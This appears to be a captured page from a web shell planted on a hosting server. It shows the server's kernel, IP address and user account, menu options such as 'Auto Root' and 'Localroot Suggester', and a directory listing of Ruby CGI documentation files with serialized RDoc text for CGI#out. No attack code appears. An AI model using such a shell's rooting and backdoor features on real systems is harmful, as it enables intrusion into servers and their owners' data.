Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
CGI /
Delete
Unzip
Name
Size
Permission
Date
Action
Cookie
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
HtmlExtension
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
InvalidEncoding
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
QueryExtension
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Session
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
accept_charset%3d-c.ri
269
B
-rw-r--r--
2023-07-26 17:26
accept_charset-c.ri
256
B
-rw-r--r--
2023-07-26 17:26
accept_charset-i.ri
241
B
-rw-r--r--
2023-07-26 17:26
cdesc-CGI.ri
11.85
KB
-rw-r--r--
2023-07-26 17:26
env_table-i.ri
204
B
-rw-r--r--
2023-07-26 17:26
escape-c.ri
339
B
-rw-r--r--
2023-07-26 17:26
escapeElement-c.ri
942
B
-rw-r--r--
2023-07-26 17:26
escapeHTML-c.ri
377
B
-rw-r--r--
2023-07-26 17:26
escape_element-c.ri
236
B
-rw-r--r--
2023-07-26 17:26
escape_html-c.ri
227
B
-rw-r--r--
2023-07-26 17:26
header-i.ri
4.26
KB
-rw-r--r--
2023-07-26 17:26
new-c.ri
2.5
KB
-rw-r--r--
2023-07-26 17:26
out-i.ri
2.54
KB
-rw-r--r--
2023-07-26 17:26
parse-c.ri
449
B
-rw-r--r--
2023-07-26 17:26
pretty-c.ri
711
B
-rw-r--r--
2023-07-26 17:26
print-i.ri
398
B
-rw-r--r--
2023-07-26 17:26
rfc1123_date-c.ri
404
B
-rw-r--r--
2023-07-26 17:26
stdinput-i.ri
205
B
-rw-r--r--
2023-07-26 17:26
stdoutput-i.ri
208
B
-rw-r--r--
2023-07-26 17:26
unescape-c.ri
383
B
-rw-r--r--
2023-07-26 17:26
unescapeElement-c.ri
632
B
-rw-r--r--
2023-07-26 17:26
unescapeHTML-c.ri
382
B
-rw-r--r--
2023-07-26 17:26
unescape_element-c.ri
242
B
-rw-r--r--
2023-07-26 17:26
unescape_html-c.ri
233
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI"out:EFI"CGI#out;FF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I":Print an HTTP header and body to $DEFAULT_OUTPUT ($>);To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type: NOTE:@items[o:RDoc::Markup::ListItem:@labelI"+content_type_string+;T; [o; ; [I"AIf a string is passed, it is assumed to be the content type.;To;;I"+headers_hash+;T; [o; ; [I"@This is a Hash of headers, similar to that used by #header.;To;;I"+block+;T; [o; ; [I"IA block is required and should evaluate to the body of the response.;T@o; ; [I"I<tt>Content-Length</tt> is automatically calculated from the size of;TI".the String returned by the content block.;T@o; ; [I"FIf <tt>ENV['REQUEST_METHOD'] == "HEAD"</tt>, then only the header;TI"His output (the content block is still required, but it is ignored).;T@o; ; [I"HIf the charset is "iso-2022-jp" or "euc-jp" or "shift_jis" then the;TI"Kcontent is converted to this charset, and the language is set to "ja".;T@o; ; [I" Example:;T@o:RDoc::Markup::Verbatim; [,I"cgi = CGI.new ;FI"cgi.out{ "string" } ;FI"! # Content-Type: text/html ;FI" # Content-Length: 6 ;FI" # ;FI" # string ;FI" ;FI"(cgi.out("text/plain") { "string" } ;FI"" # Content-Type: text/plain ;FI" # Content-Length: 6 ;FI" # ;FI" # string ;FI" ;FI"#cgi.out("nph" => true, ;FI"2 "status" => "OK", # == "200 OK" ;FI"5 "server" => ENV['SERVER_SOFTWARE'], ;FI"& "connection" => "close", ;FI"* "type" => "text/html", ;FI", "charset" => "iso-2022-jp", ;FI"> # Content-Type: text/html; charset=iso-2022-jp ;FI"# "language" => "ja", ;FI": "expires" => Time.now + (3600 * 24 * 30), ;FI"1 "cookie" => [cookie1, cookie2], ;FI") "my_header1" => "my_value", ;FI"6 "my_header2" => "my_value") { "string" } ;FI" # HTTP/1.1 200 OK ;FI". # Date: Sun, 15 May 2011 17:35:54 GMT ;FI" # Server: Apache 2.2.0 ;FI" # Connection: close ;FI"7 # Content-Type: text/html; charset=iso-2022-jp ;FI" # Content-Length: 6 ;FI" # Content-Language: ja ;FI"1 # Expires: Tue, 14 Jun 2011 17:35:54 GMT ;FI" # Set-Cookie: foo ;FI" # Set-Cookie: bar ;FI" # my_header1: my_value ;FI" # my_header2: my_value ;FI" # ;FI" # string;F: @file0I"Dcgi.out(content_type_string='text/html') cgi.out(headers_hash) ;TI"